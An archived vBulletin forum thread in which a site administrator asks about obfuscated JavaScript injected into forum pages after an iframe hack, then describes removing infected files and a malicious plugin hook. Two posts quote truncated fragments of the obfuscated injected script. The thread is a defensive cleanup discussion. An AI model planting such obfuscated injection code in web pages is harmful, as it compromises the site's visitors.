The Arcive of Official vBulletin Modifications Site.It is not a VB3 engine, just a parsed copy! |
|
|
|||||||
|
#1
05-04-2009, 02:20 PM
|
|||
|
|||
Question about javascript code
On my site when I go to source code between headinclude and header template is writen this code:
<script language=javascript><!-- (function(N9MNW){var MEhs8='%';var CnJ3=('var,20a,3d,22Sc,72i,70,74En,67ine..... Do anyone knows what it this and how to delete? I'm asking because we recently have iframe hack, and I wont to know if this code is also hack. 
|
|
#3
05-04-2009, 03:07 PM
|
|||
|
|||
|
I would but I cant't find it, because when we upgraded vb i can't any more modify templates. When I want to modify templates this show up:
http://rapidshare.com/files/22910421...lates.png.html Do you have idea how to fix this? Thanks
|
|
#5
05-04-2009, 09:44 PM
|
|||
|
|||
|
Yes,I did and I find few .html pages that we didn't put there, and I delete them.
But I can't be 100 % sure that there isn't any files that shouldn't be there. Would be wise to delete vbulletin and upload again?
|
|
#6
05-04-2009, 09:52 PM
|
||||
|
||||
|
Did you run the Suspect Files on your site and see what showed up?
I would definitely go through each directory and make sure only the vbulletin files are present - by either replacing the whole directory with a new default one or by manually viewing/replacing all files.
|
|
#7
05-04-2009, 10:58 PM
|
|||
|
|||
|
I run suspect files, and I find over 20 files infected with javascript, and I delete them all.
Now I can modify templates, thank you. I didn't know that vbulletin have this option. But on index.php page is still javascript code, I will try to find it. --------------- Added [DATE]1241541635[/DATE] at [TIME]1241541635[/TIME] --------------- I search in the templates, and it's not there. I check up all files in home directory, one by one, and delete where were the code, but it still showing up on index.php. Do you have idea where could it be? Maybe this helps, infecetd code is showing up on: index.php arcade.php login.php In source code looks like this: ---------------------------------------------------------------------- <!-- END TEMPLATE: headinclude --> <title>a</title> </head><script language=javascript><!-- (function(){var O55='%';var xnB='>76>61>72>20>61>3d>22Sc>72i>70tEngine>22>2cb> 3d>22Version(>29+>22>2c> 6a>3d>22>22>2cu>3dnav>69g>61to>72>2e>75s>65>72>41> 67ent>3bif((>75>2ein>64 >6................................................ ..(); --></script> <body> <!-- BEGIN TEMPLATE: header --> <!-- logo --> ------------------------------------------------------------------------ --------------- Added [DATE]1241554395[/DATE] at [TIME]1241554395[/TIME] --------------- I find where the problem is. I remove forumhome_complete hook and code isn't there anymore.
|
 |
«
Previous Thread
|
Next Thread
»
Linear Mode
|
|
All times are GMT. The time now is 01:30 AM.